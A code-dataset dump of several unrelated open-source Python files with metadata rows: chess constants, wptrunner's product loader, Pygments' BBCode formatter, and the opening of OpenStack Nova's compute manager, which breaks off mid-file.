sliders = [ False, False, False, True, True, True, False, False ]
# Piece signs
reprSign = ["", "P", "N", "B", "R", "Q", "K"]
chr2Sign = {"k":KING, "q": QUEEN, "r": ROOK, "b": BISHOP, "n": KNIGHT, "p":PAWN}
chrU2Sign = {"K":KING, "Q": QUEEN, "R": ROOK, "B": BISHOP, "N": KNIGHT, "P":PAWN}
################################################################################
# Move values #
################################################################################
NORMAL_MOVE, QUEEN_CASTLE, KING_CASTLE, ENPASSANT, \
KNIGHT_PROMOTION, BISHOP_PROMOTION, ROOK_PROMOTION, QUEEN_PROMOTION, KING_PROMOTION, NULL_MOVE, DROP = range(11)
PROMOTIONS = (KING_PROMOTION, QUEEN_PROMOTION, ROOK_PROMOTION, BISHOP_PROMOTION, KNIGHT_PROMOTION)
# Algebraic notation types: Short, Long, Figure and Simpe
SAN, LAN, FAN, AN = range(4)
# Castling notation types: e.g., O-O, e1g1, e1h1
CASTLE_SAN, CASTLE_KK, CASTLE_KR = range(3)
FAN_PIECES = [
["", u"♙", u"♘", u"♗", u"♖", u"♕", u"♔", ""],
["", u"♟", u"♞", u"♝", u"♜", u"♛", u"♚", ""]
]
################################################################################
# Castling values #
################################################################################
W_OO, W_OOO, B_OO, B_OOO = [2**i for i in range(4)]
CAS_FLAGS = ((W_OOO,W_OO),(B_OOO,B_OO))
W_CASTLED, B_CASTLED = [2**i for i in range(2)]
################################################################################
# Cords types #
################################################################################
A1, B1, C1, D1, E1, F1, G1, H1, \
A2, B2, C2, D2, E2, F2, G2, H2, \
A3, B3, C3, D3, E3, F3, G3, H3, \
A4, B4, C4, D4, E4, F4, G4, H4, \
A5, B5, C5, D5, E5, F5, G5, H5, \
A6, B6, C6, D6, E6, F6, G6, H6, \
A7, B7, C7, D7, E7, F7, G7, H7, \
A8, B8, C8, D8, E8, F8, G8, H8 = range (64)
reprCord = [
"a1", "b1", "c1", "d1", "e1", "f1", "g1", "h1",
"a2", "b2", "c2", "d2", "e2", "f2", "g2", "h2",
"a3", "b3", "c3", "d3", "e3", "f3", "g3", "h3",
"a4", "b4", "c4", "d4", "e4", "f4", "g4", "h4",
"a5", "b5", "c5", "d5", "e5", "f5", "g5", "h5",
"a6", "b6", "c6", "d6", "e6", "f6", "g6", "h6",
"a7", "b7", "c7", "d7", "e7", "f7", "g7", "h7",
"a8", "b8", "c8", "d8", "e8", "f8", "g8", "h8"
]
reprFile = ["a", "b", "c", "d", "e", "f", "g", "h"]
reprRank = ["1", "2", "3", "4", "5", "6", "7", "8"]
cordDic = {}
for cord, name in enumerate(reprCord):
cordDic[name] = cord
################################################################################
# User interface #
################################################################################
# Hint modes
OPENING, ENDGAME, HINT, SPY = ["opening", "endgame", "hint", "spy"]
# Sound settings
SOUND_MUTE, SOUND_BEEP, SOUND_SELECT, SOUND_URI = range(4)
# Brush types. Send piece object for Piece brush
CLEAR, ENPAS = range(2)
# Main menu items
GAME_MENU_ITEMS = ("save_game1", "save_game_as1", "export_position1", "analyze_game1",
"properties1", "close1")
ACTION_MENU_ITEMS = ("abort", "adjourn", "draw", "pause1", "resume1", "undo1",
"call_flag", "resign", "ask_to_move")
VIEW_MENU_ITEMS = ("rotate_board1", "show_sidepanels", "hint_mode", "spy_mode")
MENU_ITEMS = GAME_MENU_ITEMS + ACTION_MENU_ITEMS + VIEW_MENU_ITEMS
################################################################################
# Subprocess #
################################################################################
SUBPROCESS_PTY, SUBPROCESS_SUBPROCESS, SUBPROCESS_FORK = range(3)
| gpl-3.0 | 4,613,990,617,096,706,000 | 5,332,708,665,482,615,000 | 42.841346 | 112 | 0.491063 | false |
sliz1/servo | tests/wpt/harness/wptrunner/products.py | 118 | 2500 | # This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this file,
# You can obtain one at http://mozilla.org/MPL/2.0/.
import os
import importlib
import imp
from .browsers import product_list
def products_enabled(config):
names = config.get("products", {}).keys()
if not names:
return product_list
else:
return names
def product_module(config, product):
here = os.path.join(os.path.split(__file__)[0])
product_dir = os.path.join(here, "browsers")
if product not in products_enabled(config):
raise ValueError("Unknown product %s" % product)
path = config.get("products", {}).get(product, None)
if path:
module = imp.load_source('wptrunner.browsers.' + product, path)
else:
module = importlib.import_module("wptrunner.browsers." + product)
if not hasattr(module, "__wptrunner__"):
raise ValueError("Product module does not define __wptrunner__ variable")
return module
def load_product(config, product):
module = product_module(config, product)
data = module.__wptrunner__
check_args = getattr(module, data["check_args"])
browser_cls = getattr(module, data["browser"])
browser_kwargs = getattr(module, data["browser_kwargs"])
executor_kwargs = getattr(module, data["executor_kwargs"])
env_options = getattr(module, data["env_options"])()
run_info_extras = (getattr(module, data["run_info_extras"])
if "run_info_extras" in data else lambda **kwargs:{})
executor_classes = {}
for test_type, cls_name in data["executor"].iteritems():
cls = getattr(module, cls_name)
executor_classes[test_type] = cls
return (check_args,
browser_cls, browser_kwargs,
executor_classes, executor_kwargs,
env_options, run_info_extras)
def load_product_update(config, product):
"""Return tuple of (property_order, boolean_properties) indicating the
run_info properties to use when constructing the expectation data for
this product. None for either key indicates that the default keys
appropriate for distinguishing based on platform will be used."""
module = product_module(config, product)
data = module.__wptrunner__
update_properties = (getattr(module, data["update_properties"])()
if "update_properties" in data else (None, None))
return update_properties
| mpl-2.0 | -3,488,457,681,735,174,000 | -8,006,708,692,965,102,000 | 33.722222 | 81 | 0.6644 | false |
vicky2135/lucious | oscar/lib/python2.7/site-packages/pygments/formatters/bbcode.py | 31 | 3314 | # -*- coding: utf-8 -*-
"""
pygments.formatters.bbcode
~~~~~~~~~~~~~~~~~~~~~~~~~~
BBcode formatter.
:copyright: Copyright 2006-2017 by the Pygments team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
from pygments.formatter import Formatter
from pygments.util import get_bool_opt
__all__ = ['BBCodeFormatter']
class BBCodeFormatter(Formatter):
"""
Format tokens with BBcodes. These formatting codes are used by many
bulletin boards, so you can highlight your sourcecode with pygments before
posting it there.
This formatter has no support for background colors and borders, as there
are no common BBcode tags for that.
Some board systems (e.g. phpBB) don't support colors in their [code] tag,
so you can't use the highlighting together with that tag.
Text in a [code] tag usually is shown with a monospace font (which this
formatter can do with the ``monofont`` option) and no spaces (which you
need for indentation) are removed.
Additional options accepted:
`style`
The style to use, can be a string or a Style subclass (default:
``'default'``).
`codetag`
If set to true, put the output into ``[code]`` tags (default:
``false``)
`monofont`
If set to true, add a tag to show the code with a monospace font
(default: ``false``).
"""
name = 'BBCode'
aliases = ['bbcode', 'bb']
filenames = []
def __init__(self, **options):
Formatter.__init__(self, **options)
self._code = get_bool_opt(options, 'codetag', False)
self._mono = get_bool_opt(options, 'monofont', False)
self.styles = {}
self._make_styles()
def _make_styles(self):
for ttype, ndef in self.style:
start = end = ''
if ndef['color']:
start += '[color=#%s]' % ndef['color']
end = '[/color]' + end
if ndef['bold']:
start += '[b]'
end = '[/b]' + end
if ndef['italic']:
start += '[i]'
end = '[/i]' + end
if ndef['underline']:
start += '[u]'
end = '[/u]' + end
# there are no common BBcodes for background-color and border
self.styles[ttype] = start, end
def format_unencoded(self, tokensource, outfile):
if self._code:
outfile.write('[code]')
if self._mono:
outfile.write('[font=monospace]')
lastval = ''
lasttype = None
for ttype, value in tokensource:
while ttype not in self.styles:
ttype = ttype.parent
if ttype == lasttype:
lastval += value
else:
if lastval:
start, end = self.styles[lasttype]
outfile.write(''.join((start, lastval, end)))
lastval = value
lasttype = ttype
if lastval:
start, end = self.styles[lasttype]
outfile.write(''.join((start, lastval, end)))
if self._mono:
outfile.write('[/font]')
if self._code:
outfile.write('[/code]')
if self._code or self._mono:
outfile.write('\n')
| bsd-3-clause | -5,017,909,870,804,534,000 | 4,530,058,659,867,485,000 | 29.40367 | 78 | 0.539529 | false |
alexandrucoman/vbox-nova-driver | nova/compute/manager.py | 1 | 323194 | # Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# Copyright 2011 Justin Santa Barbara
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Handles all processes relating to instances (guest vms).
The :py:class:`ComputeManager` class is a :py:class:`nova.manager.Manager` that
handles RPC calls relating to creating instances. It is responsible for
building a disk image, launching it via the underlying virtualization driver,
responding to calls to check its state, attaching persistent storage, and
terminating it.
"""
import base64
import contextlib
import functools
import socket
import sys
import time
import traceback
import uuid
from cinderclient import exceptions as cinder_exception
import eventlet.event
from eventlet import greenthread
import eventlet.semaphore
import eventlet.timeout
from keystoneclient import exceptions as keystone_exception
from oslo_config import cfg
from oslo_log import log as logging
import oslo_messaging as messaging
from oslo_serialization import jsonutils
from oslo_utils import excutils
from oslo_utils import strutils
from oslo_utils import timeutils
import six
from nova import block_device
from nova.cells import rpcapi as cells_rpcapi
from nova.cloudpipe import pipelib
from nova import compute
from nova.compute import build_results
from nova.compute import power_state
from nova.compute import resource_tracker
from nova.compute import rpcapi as compute_rpcapi
from nova.compute import task_states
from nova.compute import utils as compute_utils
from nova.compute import vm_states
from nova import conductor
from nova import consoleauth
import nova.context
from nova import exception
from nova import hooks
from nova.i18n import _
from nova.i18n import _LE
from nova.i18n import _LI
from nova.i18n import _LW
from nova import image
from nova.image import glance
from nova import manager
from nova import network
from nova.network import model as network_model
from nova.network.security_group import openstack_driver
from nova import objects
from nova.objects import base as obj_base
from nova.openstack.common import loopingcall
from nova.openstack.common import periodic_task
from nova import paths
from nova import rpc
from nova import safe_utils
from nova.scheduler import client as scheduler_client
from nova.scheduler import rpcapi as scheduler_rpcapi
from nova import utils
from nova.virt import block_device as driver_block_device
from nova.virt import configdrive
from nova.virt import driver
from nova.virt import event as virtevent
from nova.virt import storage_users
from nova.virt import virtapi
from nova import volume
from nova.volume import encryptors
compute_opts = [
cfg.StrOpt('console_host',
default=socket.gethostname(),
help='Console proxy host to use to connect '
'to instances on this host.'),
cfg.StrOpt('default_access_ip_network_name',
help='Name of network to use to set access IPs for instances'),
cfg.BoolOpt('defer_iptables_apply',
default=False,
help='Whether to batch up the application of IPTables rules'
' during a host restart and apply all at the end of the'
' init phase'),
cfg.StrOpt('instances_path',
default=paths.state_path_def('instances'),
help='Where instances are stored on disk'),
cfg.BoolOpt('instance_usage_audit',
default=False,
help="Generate periodic compute.instance.exists"
" notifications"),
cfg.IntOpt('live_migration_retry_count',
default=30,
help="Number of 1 second retries needed in live_migration"),
cfg.BoolOpt('resume_guests_state_on_host_boot',
default=False,
help='Whether to start guests that were running before the '
'host rebooted'),
cfg.IntOpt('network_allocate_retries',
default=0,
help="Number of times to retry network allocation on failures"),
cfg.IntOpt('max_concurrent_builds',
default=10,
help='Maximum number of instance builds to run concurrently'),
cfg.IntOpt('block_device_allocate_retries',
default=60,
help='Number of times to retry block device'
' allocation on failures')
]
interval_opts = [
cfg.IntOpt('bandwidth_poll_interval',
default=600,
help='Interval to pull network bandwidth usage info. Not '
'supported on all hypervisors. Set to -1 to disable. '
'Setting this to 0 will run at the default rate.'),
cfg.IntOpt('sync_power_state_interval',
default=600,
help='Interval to sync power states between the database and '
'the hypervisor. Set to -1 to disable. '
'Setting this to 0 will run at the default rate.'),
cfg.IntOpt("heal_instance_info_cache_interval",
default=60,
help="Number of seconds between instance network information "
"cache updates"),
cfg.IntOpt('reclaim_instance_interval',
default=0,
help='Interval in seconds for reclaiming deleted instances'),
cfg.IntOpt('volume_usage_poll_interval',
default=0,
help='Interval in seconds for gathering volume usages'),
cfg.IntOpt('shelved_poll_interval',
default=3600,
help='Interval in seconds for polling shelved instances to '
'offload. Set to -1 to disable.'
'Setting this to 0 will run at the default rate.'),
cfg.IntOpt('shelved_offload_time',
default=0,
help='Time in seconds before a shelved instance is eligible '
'for removing from a host. -1 never offload, 0 offload '
'immediately when shelved'),
cfg.IntOpt('instance_delete_interval',
default=300,
help='Interval in seconds for retrying failed instance file '
'deletes. Set to -1 to disable. '
'Setting this to 0 will run at the default rate.'),
cfg.IntOpt('block_device_allocate_retries_interval',
default=3,
help='Waiting time interval (seconds) between block'
' device allocation retries on failures'),
cfg.IntOpt('scheduler_instance_sync_interval',
default=120,
help='Waiting time interval (seconds) between sending the '
'scheduler a list of current instance UUIDs to verify '
'that its view of instances is in sync with nova. If the '
'CONF option `scheduler_tracks_instance_changes` is '
'False, changing this option will have no effect.'),
]
timeout_opts = [
cfg.IntOpt("reboot_timeout",
default=0,
help="Automatically hard reboot an instance if it has been "
"stuck in a rebooting state longer than N seconds. "
"Set to 0 to disable."),
cfg.IntOpt("instance_build_timeout",
default=0,
help="Amount of time in seconds an instance can be in BUILD "
"before going into ERROR status. "
"Set to 0 to disable."),
cfg.IntOpt("rescue_timeout",
default=0,
help="Automatically unrescue an instance after N seconds. "
"Set to 0 to disable."),
cfg.IntOpt("resize_confirm_window",
default=0,
help="Automatically confirm resizes after N seconds. "
"Set to 0 to disable."),
cfg.IntOpt("shutdown_timeout",
default=60,
help="Total amount of time to wait in seconds for an instance "
"to perform a clean shutdown."),
]
running_deleted_opts = [
cfg.StrOpt("running_deleted_instance_action",
default="reap",
help="Action to take if a running deleted instance is detected."
" Valid options are 'noop', 'log', 'shutdown', or 'reap'. "
"Set to 'noop' to take no action."),
cfg.IntOpt("running_deleted_instance_poll_interval",
default=1800,
help="Number of seconds to wait between runs of the cleanup "
"task."),
cfg.IntOpt("running_deleted_instance_timeout",
default=0,
help="Number of seconds after being deleted when a running "
"instance should be considered eligible for cleanup."),
]
instance_cleaning_opts = [
cfg.IntOpt('maximum_instance_delete_attempts',
default=5,
help='The number of times to attempt to reap an instance\'s '
'files.'),
]
CONF = cfg.CONF
CONF.register_opts(compute_opts)
CONF.register_opts(interval_opts)
CONF.register_opts(timeout_opts)
CONF.register_opts(running_deleted_opts)
CONF.register_opts(instance_cleaning_opts)
CONF.import_opt('allow_resize_to_same_host', 'nova.compute.api')
CONF.import_opt('console_topic', 'nova.console.rpcapi')
CONF.import_opt('host', 'nova.netconf')
CONF.import_opt('my_ip', 'nova.netconf')
CONF.import_opt('vnc_enabled', 'nova.vnc')
CONF.import_opt('enabled', 'nova.spice', group='spice')
CONF.import_opt('enable', 'nova.cells.opts', group='cells')
CONF.import_opt('image_cache_manager_interval', 'nova.virt.imagecache')
CONF.import_opt('enabled', 'nova.rdp', group='rdp')
CONF.import_opt('html5_proxy_base_url', 'nova.rdp', group='rdp')
CONF.import_opt('enabled', 'nova.console.serial', group='serial_console')
CONF.import_opt('base_url', 'nova.console.serial', group='serial_console')
CONF.import_opt('destroy_after_evacuate', 'nova.utils', group='workarounds')
CONF.import_opt('scheduler_tracks_instance_changes',
'nova.scheduler.host_manager')
CONF.import_opt('vrde_password_length',
'nova.virt.virtualbox.consoleops', group='virtualbox')
CONF.import_opt('vrde_require_instance_uuid_as_password',
'nova.virt.virtualbox.consoleops', group='virtualbox')
LOG = logging.getLogger(__name__)
get_notifier = functools.partial(rpc.get_notifier, service='compute')
wrap_exception = functools.partial(exception.wrap_exception,
get_notifier=get_notifier)
@utils.expects_func_args('migration')
def errors_out_migration(function):
"""Decorator to error out migration on failure."""
@functools.wraps(function)
def decorated_function(self, context, *args, **kwargs):
try:
return function(self, context, *args, **kwargs)
except Exception as ex:
with excutils.save_and_reraise_exception():
wrapped_func = utils.get_wrapped_function(function)
keyed_args = safe_utils.getcallargs(wrapped_func, context,
*args, **kwargs)
migration = keyed_args['migration']
# NOTE(rajesht): If InstanceNotFound error is thrown from
# decorated function, migration status should be set to
# 'error', without checking current migration status.
if not isinstance(ex, exception.InstanceNotFound):
status = migration.status
if status not in ['migrating', 'post-migrating']:
return
migration.status = 'error'
try:
with migration.obj_as_admin():
migration.save()
except Exception:
LOG.debug('Error setting migration status '
'for instance %s.',
migration.instance_uuid, exc_info=True)
return decorated_function
@utils.expects_func_args('instance')
def reverts_task_state(function):
"""Decorator to revert task_state on failure."""
@functools.wraps(function)
def decorated_function(self, context, *args, **kwargs):
try:
return function(self, context, *args, **kwargs)
except exception.UnexpectedTaskStateError as e:
# Note(maoy): unexpected task state means the current
# task is preempted. Do not clear task state in this
# case.
with excutils.save_and_reraise_exception():
LOG.info(_LI("Task possibly preempted: %s"),
e.format_message())
except Exception:
with excutils.save_and_reraise_exception():
wrapped_func = utils.get_wrapped_function(function)
keyed_args = safe_utils.getcallargs(wrapped_func, context,
*args, **kwargs)
# NOTE(mriedem): 'instance' must be in keyed_args because we
# have utils.expects_func_args('instance') decorating this
# method.
instance_uuid = keyed_args['instance']['uuid']
try:
self._instance_update(context,
instance_uuid,
task_state=None)
except exception.InstanceNotFound:
# We might delete an instance that failed to build shortly
# after it errored out this is an expected case and we
# should not trace on it.
pass
except Exception as e:
msg = _LW("Failed to revert task state for instance. "
"Error: %s")
LOG.warning(msg, e, instance_uuid=instance_uuid)
return decorated_function
@utils.expects_func_args('instance')
def wrap_instance_fault(function):
"""Wraps a method to catch exceptions related to instances.
This decorator wraps a method to catch any exceptions having to do with
an instance that may get thrown. It then logs an instance fault in the db.
"""
@functools.wraps(function)
def decorated_function(self, context, *args, **kwargs):
try:
return function(self, context, *args, **kwargs)
except exception.InstanceNotFound:
raise
except Exception as e:
# NOTE(gtt): If argument 'instance' is in args rather than kwargs,
# we will get a KeyError exception which will cover up the real
# exception. So, we update kwargs with the values from args first.
# then, we can get 'instance' from kwargs easily.
kwargs.update(dict(zip(function.func_code.co_varnames[2:], args)))
with excutils.save_and_reraise_exception():
compute_utils.add_instance_fault_from_exc(context,
kwargs['instance'], e, sys.exc_info())
return decorated_function
@utils.expects_func_args('instance')
def wrap_instance_event(function):
"""Wraps a method to log the event taken on the instance, and result.
This decorator wraps a method to log the start and result of an event, as
part of an action taken on an instance.
"""
@functools.wraps(function)
def decorated_function(self, context, *args, **kwargs):
wrapped_func = utils.get_wrapped_function(function)
keyed_args = safe_utils.getcallargs(wrapped_func, context, *args,
**kwargs)
instance_uuid = keyed_args['instance']['uuid']
event_name = 'compute_{0}'.format(function.func_name)
with compute_utils.EventReporter(context, event_name, instance_uuid):
return function(self, context, *args, **kwargs)
return decorated_function
@utils.expects_func_args('image_id', 'instance')
def delete_image_on_error(function):
"""Used for snapshot related method to ensure the image created in
compute.api is deleted when an error occurs.
"""
@functools.wraps(function)
def decorated_function(self, context, image_id, instance,
*args, **kwargs):
try:
return function(self, context, image_id, instance,
*args, **kwargs)
except Exception:
with excutils.save_and_reraise_exception():
LOG.debug("Cleaning up image %s", image_id,
exc_info=True, instance=instance)
try:
self.image_api.delete(context, image_id)
except Exception:
LOG.exception(_LE("Error while trying to clean up "
"image %s"), image_id,
instance=instance)
return decorated_function
# TODO(danms): Remove me after Icehouse
# NOTE(mikal): if the method being decorated has more than one decorator, then
# put this one first. Otherwise the various exception handling decorators do
# not function correctly.
def object_compat(function):
"""Wraps a method that expects a new-world instance
This provides compatibility for callers passing old-style dict
instances.
"""
@functools.wraps(function)
def decorated_function(self, context, *args, **kwargs):
def _load_instance(instance_or_dict):
if isinstance(instance_or_dict, dict):
# try to get metadata and system_metadata for most cases but
# only attempt to load those if the db instance already has
# those fields joined
metas = [meta for meta in ('metadata', 'system_metadata')
if meta in instance_or_dict]
instance = objects.Instance._from_db_object(
context, objects.Instance(), instance_or_dict,
expected_attrs=metas)
instance._context = context
return instance
return instance_or_dict
try:
kwargs['instance'] = _load_instance(kwargs['instance'])
except KeyError:
args = (_load_instance(args[0]),) + args[1:]
migration = kwargs.get('migration')
if isinstance(migration, dict):
migration = objects.Migration._from_db_object(
context.elevated(), objects.Migration(),
migration)
kwargs['migration'] = migration
return function(self, context, *args, **kwargs)
return decorated_function
# TODO(danms): Remove me after Icehouse
def aggregate_object_compat(function):
"""Wraps a method that expects a new-world aggregate."""
@functools.wraps(function)
def decorated_function(self, context, *args, **kwargs):
aggregate = kwargs.get('aggregate')
if isinstance(aggregate, dict):
aggregate = objects.Aggregate._from_db_object(
context.elevated(), objects.Aggregate(),
aggregate)
kwargs['aggregate'] = aggregate
return function(self, context, *args, **kwargs)
return decorated_function
class InstanceEvents(object):
def __init__(self):
self._events = {}
@staticmethod
def _lock_name(instance):
return '%s-%s' % (instance.uuid, 'events')
def prepare_for_instance_event(self, instance, event_name):
"""Prepare to receive an event for an instance.
This will register an event for the given instance that we will
wait on later. This should be called before initiating whatever
action will trigger the event. The resulting eventlet.event.Event
object should be wait()'d on to ensure completion.
:param instance: the instance for which the event will be generated
:param event_name: the name of the event we're expecting
:returns: an event object that should be wait()'d on
"""
if self._events is None:
# NOTE(danms): We really should have a more specific error
# here, but this is what we use for our default error case
raise exception.NovaException('In shutdown, no new events '
'can be scheduled')
@utils.synchronized(self._lock_name(instance))
def _create_or_get_event():
if instance.uuid not in self._events:
self._events.setdefault(instance.uuid, {})
return self._events[instance.uuid].setdefault(
event_name, eventlet.event.Event())
LOG.debug('Preparing to wait for external event %(event)s',
{'event': event_name}, instance=instance)
return _create_or_get_event()
def pop_instance_event(self, instance, event):
"""Remove a pending event from the wait list.
This will remove a pending event from the wait list so that it
can be used to signal the waiters to wake up.
:param instance: the instance for which the event was generated
:param event: the nova.objects.external_event.InstanceExternalEvent
that describes the event
:returns: the eventlet.event.Event object on which the waiters
are blocked
"""
no_events_sentinel = object()
no_matching_event_sentinel = object()
@utils.synchronized(self._lock_name(instance))
def _pop_event():
if not self._events:
LOG.debug('Unexpected attempt to pop events during shutdown',
instance=instance)
return no_events_sentinel
events = self._events.get(instance.uuid)
if not events:
return no_events_sentinel
_event = events.pop(event.key, None)
if not events:
del self._events[instance.uuid]
if _event is None:
return no_matching_event_sentinel
return _event
result = _pop_event()
if result is no_events_sentinel:
LOG.debug('No waiting events found dispatching %(event)s',
{'event': event.key},
instance=instance)
return None
elif result is no_matching_event_sentinel:
LOG.debug('No event matching %(event)s in %(events)s',
{'event': event.key,
'events': self._events.get(instance.uuid, {}).keys()},
instance=instance)
return None
else:
return result
def clear_events_for_instance(self, instance):
"""Remove all pending events for an instance.
This will remove all events currently pending for an instance
and return them (indexed by event name).
:param instance: the instance for which events should be purged
:returns: a dictionary of {event_name: eventlet.event.Event}
"""
@utils.synchronized(self._lock_name(instance))
def _clear_events():
if self._events is None:
LOG.debug('Unexpected attempt to clear events during shutdown',
instance=instance)
return dict()
return self._events.pop(instance.uuid, {})
return _clear_events()
def cancel_all_events(self):
our_events = self._events
# NOTE(danms): Block new events
self._events = None
for instance_uuid, events in our_events.items():
for event_name, eventlet_event in events.items():
LOG.debug('Canceling in-flight event %(event)s for '
'instance %(instance_uuid)s',
{'event': event_name,
'instance_uuid': instance_uuid})
name, tag = event_name.split('-', 1)
event = objects.InstanceExternalEvent(
instance_uuid=instance_uuid,
name=name, status='failed',
tag=tag, data={})
eventlet_event.send(event)
class ComputeVirtAPI(virtapi.VirtAPI):
def __init__(self, compute):
super(ComputeVirtAPI, self).__init__()
self._compute = compute
def provider_fw_rule_get_all(self, context):
return self._compute.conductor_api.provider_fw_rule_get_all(context)
def _default_error_callback(self, event_name, instance):
raise exception.NovaException(_('Instance event failed'))
@contextlib.contextmanager
def wait_for_instance_event(self, instance, event_names, deadline=300,
error_callback=None):
"""Plan to wait for some events, run some code, then wait.
This context manager will first create plans to wait for the
provided event_names, yield, and then wait for all the scheduled
events to complete.
Note that this uses an eventlet.timeout.Timeout to bound the
operation, so callers should be prepared to catch that
failure and handle that situation appropriately.
If the event is not received by the specified timeout deadline,
eventlet.timeout.Timeout is raised.
If the event is received but did not have a 'completed'
status, a NovaException is raised. If an error_callback is
provided, instead of raising an exception as detailed above
for the failure case, the callback will be called with the
event_name and instance, and can return True to continue
waiting for the rest of the events, False to stop processing,
or raise an exception which will bubble up to the waiter.
:param instance: The instance for which an event is expected
:param event_names: A list of event names. Each element can be a
string event name or tuple of strings to
indicate (name, tag).
:param deadline: Maximum number of seconds we should wait for all
of the specified events to arrive.
:param error_callback: A function to be called if an event arrives
"""
if error_callback is None:
error_callback = self._default_error_callback
events = {}
for event_name in event_names:
if isinstance(event_name, tuple):
name, tag = event_name
event_name = objects.InstanceExternalEvent.make_key(
name, tag)
try:
events[event_name] = (
self._compute.instance_events.prepare_for_instance_event(
instance, event_name))
except exception.NovaException:
error_callback(event_name, instance)
# NOTE(danms): Don't wait for any of the events. They
# should all be canceled and fired immediately below,
# but don't stick around if not.
deadline = 0
yield
with eventlet.timeout.Timeout(deadline):
for event_name, event in events.items():
actual_event = event.wait()
if actual_event.status == 'completed':
continue
decision = error_callback(event_name, instance)
if decision is False:
break
class ComputeManager(manager.Manager):
"""Manages the running instances from creation to destruction."""
target = messaging.Target(version='3.40')
# How long to wait in seconds before re-issuing a shutdown
# signal to a instance during power off. The overall
# time to wait is set by CONF.shutdown_timeout.
SHUTDOWN_RETRY_INTERVAL = 10
def __init__(self, compute_driver=None, *args, **kwargs):
"""Load configuration options and connect to the hypervisor."""
self.virtapi = ComputeVirtAPI(self)
self.network_api = network.API()
self.volume_api = volume.API()
self.image_api = image.API()
self._last_host_check = 0
self._last_bw_usage_poll = 0
self._bw_usage_supported = True
self._last_bw_usage_cell_update = 0
self.compute_api = compute.API()
self.compute_rpcapi = compute_rpcapi.ComputeAPI()
self.conductor_api = conductor.API()
self.compute_task_api = conductor.ComputeTaskAPI()
self.is_neutron_security_groups = (
openstack_driver.is_neutron_security_groups())
self.consoleauth_rpcapi = consoleauth.rpcapi.ConsoleAuthAPI()
self.cells_rpcapi = cells_rpcapi.CellsAPI()
self.scheduler_rpcapi = scheduler_rpcapi.SchedulerAPI()
self.scheduler_client = scheduler_client.SchedulerClient()
self._resource_tracker_dict = {}
self.instance_events = InstanceEvents()
self._sync_power_pool = eventlet.GreenPool()
self._syncs_in_progress = {}
self.send_instance_updates = CONF.scheduler_tracks_instance_changes
if CONF.max_concurrent_builds != 0:
self._build_semaphore = eventlet.semaphore.Semaphore(
CONF.max_concurrent_builds)
else:
self._build_semaphore = compute_utils.UnlimitedSemaphore()
super(ComputeManager, self).__init__(service_name="compute",
*args, **kwargs)
self.additional_endpoints.append(_ComputeV4Proxy(self))
# NOTE(russellb) Load the driver last. It may call back into the
# compute manager via the virtapi, so we want it to be fully
# initialized before that happens.
self.driver = driver.load_compute_driver(self.virtapi, compute_driver)
self.use_legacy_block_device_info = \
self.driver.need_legacy_block_device_info
def _get_resource_tracker(self, nodename):
rt = self._resource_tracker_dict.get(nodename)
if not rt:
if not self.driver.node_is_available(nodename):
raise exception.NovaException(
_("%s is not a valid node managed by this "
"compute host.") % nodename)
rt = resource_tracker.ResourceTracker(self.host,
self.driver,
nodename)
self._resource_tracker_dict[nodename] = rt
return rt
def _update_resource_tracker(self, context, instance):
"""Let the resource tracker know that an instance has changed state."""
if (instance['host'] == self.host and
self.driver.node_is_available(instance['node'])):
rt = self._get_resource_tracker(instance.get('node'))
rt.update_usage(context, instance)
def _instance_update(self, context, instance_uuid, **kwargs):
"""Update an instance in the database using kwargs as value."""
instance_ref = self.conductor_api.instance_update(context,
instance_uuid,
**kwargs)
self._update_resource_tracker(context, instance_ref)
return instance_ref
def _set_instance_error_state(self, context, instance):
instance_uuid = instance.uuid
try:
self._instance_update(context, instance_uuid,
vm_state=vm_states.ERROR)
except exception.InstanceNotFound:
LOG.debug('Instance has been destroyed from under us while '
'trying to set it to ERROR',
instance_uuid=instance_uuid)
def _set_instance_obj_error_state(self, context, instance):
try:
instance.vm_state = vm_states.ERROR
instance.save()
except exception.InstanceNotFound:
LOG.debug('Instance has been destroyed from under us while '
'trying to set it to ERROR', instance=instance)
def _get_instances_on_driver(self, context, filters=None):
"""Return a list of instance records for the instances found
on the hypervisor which satisfy the specified filters. If filters=None
return a list of instance records for all the instances found on the
hypervisor.
"""
if not filters:
filters = {}
try:
driver_uuids = self.driver.list_instance_uuids()
if len(driver_uuids) == 0:
# Short circuit, don't waste a DB call
return objects.InstanceList()
filters['uuid'] = driver_uuids
local_instances = objects.InstanceList.get_by_filters(
context, filters, use_slave=True)
return local_instances
except NotImplementedError:
pass
# The driver doesn't support uuids listing, so we'll have
# to brute force.
driver_instances = self.driver.list_instances()
instances = objects.InstanceList.get_by_filters(context, filters,
use_slave=True)
name_map = {instance.name: instance for instance in instances}
local_instances = []
for driver_instance in driver_instances:
instance = name_map.get(driver_instance)
if not instance:
continue
local_instances.append(instance)
return local_instances
def _destroy_evacuated_instances(self, context):
"""Destroys evacuated instances.
While nova-compute was down, the instances running on it could be
evacuated to another host. Check that the instances reported
by the driver are still associated with this host. If they are
not, destroy them, with the exception of instances which are in
the MIGRATING, RESIZE_MIGRATING, RESIZE_MIGRATED, RESIZE_FINISH
task state or RESIZED vm state.
"""
our_host = self.host
filters = {'deleted': False}
local_instances = self._get_instances_on_driver(context, filters)
for instance in local_instances:
if instance.host != our_host:
if (instance.task_state in [task_states.MIGRATING,
task_states.RESIZE_MIGRATING,
task_states.RESIZE_MIGRATED,
task_states.RESIZE_FINISH]
or instance.vm_state in [vm_states.RESIZED]):
LOG.debug('Will not delete instance as its host ('
'%(instance_host)s) is not equal to our '
'host (%(our_host)s) but its task state is '
'(%(task_state)s) and vm state is '
'(%(vm_state)s)',
{'instance_host': instance.host,
'our_host': our_host,
'task_state': instance.task_state,
'vm_state': instance.vm_state},
instance=instance)
continue
if not CONF.workarounds.destroy_after_evacuate:
LOG.warning(_LW('Instance %(uuid)s appears to have been '
'evacuated from this host to %(host)s. '
'Not destroying it locally due to '
'config setting '
'"workarounds.destroy_after_evacuate". '
'If this is not correct, enable that '
